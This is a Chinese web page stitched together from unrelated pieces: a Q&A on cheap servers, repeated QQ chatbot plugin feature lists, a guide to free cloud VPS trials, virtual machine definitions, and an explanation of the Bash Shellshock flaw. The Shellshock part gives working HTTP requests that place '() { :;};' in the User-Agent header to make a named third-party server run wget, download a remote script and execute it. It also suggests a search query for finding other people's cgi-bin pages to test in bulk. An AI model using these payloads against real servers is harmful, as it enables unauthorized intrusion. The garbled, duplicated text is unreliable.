服务器一般去哪里买便宜，有MySQL数据库就行

租一个就好。

不介意备份麻烦就租国内的，介意的话就租国外的。不过国外服务器访问国内网站的话，延迟和丢包率都比较高。

还是建议香港服务器，一国两制的原因，不用备案，并且速度很快。

个人QQ机器人是指不使用腾讯QQ内部协议(如小Q机器人)而运行在其他QQ协议上的机器人。通过向机器人发送信息可即时收到回复的机器人，一般这种机器人被用于企业客服或个人使用。

图灵QQ机器人是第三方的机器人，不使用腾讯QQ内部协议，而是接入图灵机器人平台的开放接口，不采用传统的方式（把常用的数据录入到数据库中，当你提交不同的数据就会自动从数据库中调用不同的数据反馈给你，完全就是一个搜索查找功能），而是采用自然语言处理与语义理解能力，实现一问一答，自由聊天的问答机器人。 个人QQ机器人通常是指一些实用小程序，与官方QQ机器人所不同的是，大家可以通过各种方式从网上下载

机器人并且可以自己设置机器人的语言。例如：腾讯提供的小Q机器人虽然支持学习您的话，但是暂不支持随意添加删除，也不能用于群内，而由机器人爱好者制作的机器人不仅支持小Q的学习功能，也能方便的用于群内。总而言之，由于个人机器人是非官方制作，可以随时增加删除功能，所以相比官方的QQ机器人更适合个人用户使用，这方面百晓生QQ机器人做的比较出色。

个人机器人可以自由聊天、自动踢人、还有无处不在的快乐，等你来体验！ 1，在QQ上添加QQ机器人——“小灵” 为好友，就可以与小灵对话聊天，小灵机器人有问必答，即时回复答案。

2，在QQ群，邀请QQ机器人进入群里，群里的任何好友只要@小灵，就可以与“小灵”机器人进行聊天， 1．绿色插件，不写入任何数据表，不更改任何数据表；

2．多版本支持，自动支持简体中文GBK、简体中文UTF-8、繁体中文BIG5，繁体中文UTF-8等版本；

3．QQ号码绑定会员帐号功能；

4．解绑QQ帐号功能；

5．新帖通知指定QQ群、回复通知楼主功能；

6．QQ消息修改用户登录密码功能；

7．同步个性签名至论坛动态功能（可以此做站点微博系统）；

8．新消息QQ通知功能；

9．加好友QQ通知功能；

10．QQ群互联功能（可多个群里面的信息相互转发）；

11．自动修改群成员名片，屏蔽关键字踢人；

12．自动检验违规词汇； 1．可以和各类插件web接口与各类程序完美整合，并与官方同步更新，不用担心代码失效。

2．不必拥有自己的独立服务器或VPS，挂机服务器提供并维护。

3．QQ机器人远程检测功能，就算有验证码，也能智能登陆，属于国内首创。

4．web接口多样化：Discuz!X、DedeCMS、PHPCMS、记事狗微博系统、shopex、微信系统等主流PHP应用。

5．采用独创触发式通知QQ机器人发消息，彻底避免了常见qq机器人每隔1．2秒就刷新一次数据库来查找通知内容的缺陷，效率提高多达几十倍。

6．实现与网站会员绑定；实现取消绑定功能；实现查询绑定会员的基本信息等功能。

7．可以安装插件，插件被封装为QPlug格式。

8情迁机器人通过情迁系统,手机QQ等各种终端实现远程命令行操作您的电脑 1．选择与您论坛一致的插件编码，将upload内目录上传至您的论坛根目录；

2．进入后台，插件——安装新插件，按照步骤安装即可；

3．启用插件，进入插件设置面板按需设置相关参数或选项；

4．进入插件高级设置，点击登陆QQ即可； 虚拟主机QQ机器人的诞生，更好的加强了QQ与网站的联系。

1．绑定QQ到网站或者论坛，加QQ机器人为好友，验证QQ的真实有效性。

2．当你咨询QQ机器人一些问题的时候，QQ机器人会在数据库里找到相应的回答，并答复你。当然有答非所问，或者不知道回答什么的时候，所以必须要建立强大的数据库。

3．当论坛或网站，留言回复或有新帖子发布，QQ机器人会给你发个消息说明，并引导你去查看。

4．虚拟主机QQ机器人，更好的把访客从QQ引导到网站，增加了网站粘度，并增加了互动性。 QQ机器人的优势在于：强大的QQ用户支持，且操作简单！所以QQ机器人注定会成为同步微博、同步论坛、同步网站的一种趋势！

，就是将好友发来的消息推送的网站，实现qq与网站的交互。由于腾讯暂未公开qq接口。大部分非腾讯官方的机器人都是采用lumaqq等开源qq协议进行编写。已有少量的机器人已经开源，部分网站提供webservice。

QQ机器人其实就是把常用的数据录入到数据库中，当你提交不同的数据就会自动从数据库中调用不同的数据反馈给你，完全就是一个搜索查找功能，和百度的搜索没有什么两样，完全是一问一答，有的时候还是问非所答。数据中的数据还有待大量的搜集和完善。QQ机器人的发展前景是非常广阔的。

QQ人机即QQ机器人，QQ机器人是一种对QQ进行功能扩展的程序，在机器人服务端登录QQ号码后可以按照预先设定的一些指令自动完成某些任务。

QQ机器人可以自己设置机器人的语言。例如：腾讯提供的小Q机器人虽然支持学习您的话，但是暂不支持随意添加删除，也不能用于群内，而由机器人爱好者制作的机器人不仅支持小Q的学习功能，也能方便的用于群内。总而言之，由于个人机器人是非官方制作，可以随时增加删除功能，所以相比官方的QQ机器人更适合个人用户使用，这方面百晓生QQ机器人做的比较出色。

QQ机器人功能介绍：

1、绿色插件，不写入任何数据表，不更改任何数据表；

2、多版本支持，自动支持简体中文GBK、简体中文UTF-8、繁体中文BIG5，繁体中文UTF-8等版本；

3、QQ号码绑定会员帐号功能；

4、解绑QQ帐号功能；

5、新帖通知指定QQ群、回复通知楼主功能；

6、QQ消息修改用户登录密码功能；

7、同步个性签名至论坛动态功能（可以此做站点微博系统）；

8、新消息QQ通知功能；

9、加好友QQ通知功能；

10、QQ群互联功能（可多个群里面的信息相互转发）；

11、自动修改群成员名片，屏蔽关键字踢人；

12、自动检验违规词汇；

特点：

1、可以和各类插件web接口与各类程序完美整合，并与官方同步更新，不用担心代码失效。

2、不必拥有自己的独立服务器或VPS，挂机服务器提供并维护。

3、QQ机器人远程检测功能，就算有验证码，也能智能登陆，属于国内首创。

4、web接口多样化：Discuz!X、DedeCMS、PHPCMS、记事狗微博系统、shopex、微信系统等主流PHP应用。

5、采用独创触发式通知QQ机器人发消息，彻底避免了常见qq机器人每隔12秒就刷新一次数据库来查找通知内容的缺陷，效率提高多达几十倍。

6、实现与网站会员绑定；实现取消绑定功能；实现查询绑定会员的基本信息等功能。

7、可以安装插件，插件被封装为QPlug格式。

8、情迁机器人通过情迁系统，手机QQ等各种终端实现远程命令行操作您的电脑。

　　去年亚马逊AWS就已经开始酝酿着进驻国内，目前亚马逊AWS中国版已经推出，企业和开发者可开始在amazonaws申请预览版，用户只要填写一个申请表就可以等待开通和使用了，现在中国区 AWS 账号体系和 AWS 国际账号不是互通的。Dell云市场是Dell公司新近推出的云服务平台，目前有500美元免费试用3个月的VPS活动，需要信用卡验证，有朋友说国内的腾讯财付通美国运通卡等虚拟信用卡可以通过验证，但是部落自己测试时发现不容易成功，可能是Dell云市场对此做了限制。微软Windows Azure也是云服务器中一个佼佼者，早前已经在国内推出了微软Windows Azure中国版，粗略估算了一下中国版的Windows Azure已经被大家免费使用了一年以上了，VPS主机的各项配置都非常不错，用来做程序测试和建站练手等都是非常不错的。阿里云ECS其实也是类似于亚马逊AWS那样的云服务，去年开始阿里云ECS推出了免费试用活动，不过这个免费试用活动比起亚马逊AWS,微软Windows Azure等这些免费试用就大大折扣了，免费的VPS没有外网，做做VPS体验还差不多，如需带宽流量则需要花钱购买。亚马逊AWS中国版、Dell云、微软Windows Azure、阿里云ECS免费VPS主机试用。一、亚马逊AWS中国版申请试用1、AWS中国版官网：官方网站：/　2、亚马逊AWS中国版目前正在申请测试当中，现在接受中国(北京)区域有限预览的申请，主要是针对企业和公司客户，点击申请账户。　3、然后填写基本的信息，提交。　4、由于当前AWS中国版接受的申请试用用户数有限，因此你需要等待审核开通才能使用。　5、申请后，你会得到AWS中国版发来的邮件通知，待开通后就可以登录AWS控制面板使用VPS了。　二、Dell云市场免费三个月VPS主机试用1、Dell云市场官网：官方网站：cloudmarketplace/2、Dell云市场并不直接提供云服务器，而是和亚马逊AWS、GCE等云空间绑定，提供500美元的免费试用三个月VPS主机消费券。　3、填写个人基本信息，提交申请。　4、接着进入到Dell云市场控制面板，这里你可以选择使用AWS、GCE、Joyent等空间了。　5、在使用VPS主机之前，你需要验证你的信用卡，在弹出了对话框中添加信用卡。　6、Dell云市场需要双币种信用卡，虚拟信用卡测试时没有成功过。　7、Dell云市场还需要验证邮箱和手机，手机也只能使用美国手机号码，这个不是难点，我们可以使用：解决免费VPS主机申请过程中美国电话和短信验证的问题。　8、验证通过后，才能成功通过信用卡验证。　9、成功通过后，我们就可以在Dell云市场管理中心中开始管理VPS主机了。　三、微软Windows Azure开放试用1、微软Windows Azure官网：官方网站：/2、通过在线方式注册并付款 1 元人民币，将获得包含1,500 元人民币用量的免费信用额度，有效期一个月。 注:每位用户仅能申请并获得一个试用账号。　3、1元试用用户获赠 50GB 的免费数据流量，如果超过数据传输使用限额，客户的账户将会在未经事先通知的情况下暂停，被停用后，数据将被保存90天。　4、微软Windows Azure申请时需要验证手机号码，国内的手机号码即可。　5、验证成功后，你就可以开始进入到微软Windows Azure管理中心开始使用了。　6、这就是微软Windows Azure管理平台，有网站、虚拟机、云服务、SQL数据库等等。(点击放大)　7、使用微软Windows Azure最大的好处就是可以添加和创建Windows VPS主机，让没有使用过Windows VPS建站的朋友好好体验一把。　8、微软Windows Azure在创建VPS主机注意免费配额的限制，同时运行多个虚拟机的话可能会提前消耗掉一个月的免费用量。　四、阿里云ECS免费试用1、阿里云ECS官网：官方网站：/2、进入到阿里云ECS官网，点击“免费体验”。　3、阿里云ECS免费半年，配置1G内存0M带宽0G数据盘，默认0M带宽不分配公网IP，如需公网IP访问需购买或升级带宽。　4、仅限从未新购、试用过ECS的实名认证用户参与(相同手机号或相同实名认证的多个云账号仅限1台)，5个工作日内以短信和站内信通知审核通过后，需于5天内现金支付1元订单开通ECS，逾期作废，1元现金会在7个工作日内返还到您的账户中。5、除了阿里云ECS免费半年外，还有免费半年云数据库 RDS、送￥150负载均衡 SLB、送5GB开放存储 OSS、送128M缓存服务 OCS等等，有兴趣的朋友可以体验一下。　6、阿里云ECS控制面板使用起简单方便。　五、免费VPS主机试用小结1、亚马逊AWS中国版免费试用并未全面开放，相信经过2014年的测试期，今年应该会全面开放给大家使用，目前亚马逊AWS中国版的VPS免费配额并未详细给出，试用时间也没有规定。2、微软Windows Azure和阿里云ECS都需要支付1元钱才能够免费试用，相对来说Windows Azure的配置要好一些，但是只能是试用一个月，而阿里云ECS可以免费使用半年，但是没有外网带宽。

VPS(虚拟专用服务器)是将一部服务器分割多个VPS每个VPS都可分配独立公网IP地址,独立操作系统,独立超大空间,独立内存,独立CPU资源,独立执行程序和独立系统配置等

云主机是一种类似VPS主机的虚拟化技术,它是在一组集群主机上虚拟出多个类似独立主机的部分,集群中每个主机上都有云主机的一个镜像,从而大大提高了虚拟主机的安全稳定性,除非所有的集群内主机全部出现问题,云主机才会无法访问

虚拟机是指通过软件模拟的具有完整硬件系统功能的,运行在一个完全隔离环境中的完整计算机系统

目前国内把虚拟机做到完全产品化的企业,就是说用户使用起来不复杂而且没有专业术语,只有启云(北京)科技有限公司一家,他们的启云虚拟机一直卖的不错

不知道有没有帮到楼主

从昨天开始，这个从澳大利亚远渡重洋而来的BASH远程命令执行漏洞就沸腾了整个FreeBuf，大家都在谈论，“互联网的心脏又出血了”，可是，亲，到底怎么对网站进行测试？下面这段脚本

$ env x=‘() { :;}; echo vulnerable' bash -c "echo this is a test"

真的如各路大神们说的这样吗？

它与“心脏出血”漏洞不同，“心脏出血”只能借助窃取用户电脑信息，而bash 漏洞允许黑客远程控制电脑，拿到系统最高权限！其方法利用就更简单了——复制/粘贴一行命令代码即可！

Bash漏洞为什么能够执行

Bash漏洞的原理：

BASH除了可以将shell变量导出为环境变量，还可以将shell函数导出为环境变量！当前版本的bash通过以函数名作为环境变量名，以“（）{”开头的字串作为环境变量的值来将函数定义导出为环境变量。

此次爆出的漏洞在于BASH处理这样的“函数环境变量”的时候，并没有以函数结尾“}”为结束，而是一直执行其后的shell命令。

简单地说就是，Bash脚本在解析某些特殊字符串时出现逻辑错误导致可以执行后面的命令。

Bash漏洞与远程执行有啥联系

看到上面的解释，很多童鞋都理解成了本地的漏洞，然后很多人又觉得，本地有啥可以利用的，于是就忽略了这个神级漏洞的存在。我想说的是，这个漏洞，利用热度可以媲美当年的MS08-067，威力虽然弱了点，但远程控制电脑还是可以的。

首先解释一下cgi脚本。很多网站类似下面的链接：

GET http://helptenpaycom/cgi-bin/helpcenter/help_centercgiid=20HTTP/11

后台不仅仅用python、Perl来解释执行并反馈给客户端Response，当然还可以换做bash脚本来解释执行提交上来的GET/POST请求。所以，理论上，你在HTTP请求中插入一个Bash命令，比如

() { :;}; wget http://wwwmyvpsorg/testvulsh

如果服务器的Bash解释器具有这个漏洞，那么在解释上面这这句话的时候就会执行wget请求，将一个恶意的testvulsh文件下载到这个服务器，那为何说要放在HTTP头部呢？比如：

GET /cgi-bin/helpcenter/help_centercgiid=20 HTTP/11

Host: helptenpaycom

User-Agent: Mozilla/50 (X11; Ubuntu; rv:320) Gecko/20100101 Firefox/320

Accept: /

Referer: http://wwwbaiducom

Connection: keep-alive

这是因为这个漏洞是bash解释器在解释某些特殊的变量时才可以触发的：

在于BASH处理以“（）{”开头的“函数环境变量”的时候，并没有以函数结尾“}”为结束，而是一直执行其后的shell命令

通过自定义这些参数的值为“函数环境变量”的形式，就可以触发后面的命令，恶意的客户仅需要发送特殊构造的HTTP请求就可以使服务器执行特定的命令（命令的权限和解释HTTP请求的Bash脚本环境相同）。

实际测试中，我的构造的测试请求：

GET /cgi-bin/helpcenter/help_centercgiid=20 HTTP/11

Host: helptenpaycom

User-Agent: () { :;}; /usr/bin/wget http://myvpsorg/remember_client_ipphp

Accept: /

Referer: http://wwwbaiducom

Connection: keep-alive

过程是这样的：

我发送GET请求–>目标服务器cgi路径

目标服务器解析这个get请求，碰到UserAgent后面的参数，Bash解释器就执行了后面的命令

目标服务器wget–>我的myvpsorg

我的vps记录下这个访问的IP地址

然后查看我的myvpsorg服务器的访问记录，就可以确定目标有没有去访问，如果访问了，那么，很好，它是有漏洞的。下面是我的VPS接收到的wget请求访问的日志：

大神是这样测试漏洞的

当然，你也可以这样构造：

GET /cgi-bin/helpcenter/help_centercgiid=20 HTTP/11

Host: helptenpaycom

User-Agent: () { :;}; /usr/bin/wget -O /tmp/mumash ;chmod 777 /tmp/mumash; /tmp/mumash

Accept: /

Referer: http://wwwbaiducom

Connection: keep-alive

实际上执行了下面三句：

/usr/bin/wget -O /tmp/mumash http://myvpsorg/mumash ;

chmod 777 /tmp/mumash;

/tmp/mumash

你会发现，脚本就执行了，这就是Bash漏洞利用测试的精髓。

当然，你可以利用批量Google搜索：

filetype:cgi inurl:cgi-bin site:jp

然后批量提交类似的GET请求，你就能做到批量测试了。测试表明，500个url里有6-8个有bash漏洞

虚拟机（Virtual Machine）指通过软件模拟的具有完整硬件系统功能的、运行在一个完全隔离环境中的完整计算机系统。

虚拟系统通过生成现有操作系统的全新虚拟镜像，它具有真实windows系统完全一样的功能，进入虚拟系统后，所有操作都是在这个全新的独立的虚拟系统里面进行，可以独立安装运行软件，保存数据，拥有自己的独立桌面，不会对真正的系统产生任何影响 ，而且具有能够在现有系统与虚拟镜像之间灵活切换的一类操作系统。

扩展资料：

虚拟机技术最早由 IBM 于上世纪六七十年代提出，被定义为硬件设备的软件模拟实现，通常的使用模式是分时共享昂贵的大型机。 虚拟机监视器（Virtual Machine Monitor，VMM）是虚拟机技术的核心，它是一层位于操作系统和计算机硬件之间的代码，用来将硬件平台分割成多个虚拟机。

VMM 运行在特权模式，主要作用是隔离并且管理上层运行的多个虚拟机，仲裁它们对底层硬件的访问，并为每个客户操作系统虚拟一套独立于实际硬件的虚拟硬件环境（包括处理器，内存，I/O 设备）。VMM 采用某种调度算法在各个虚拟机之间共享 CPU，如采用时间片轮转调度算法

-操作系统

-虚拟机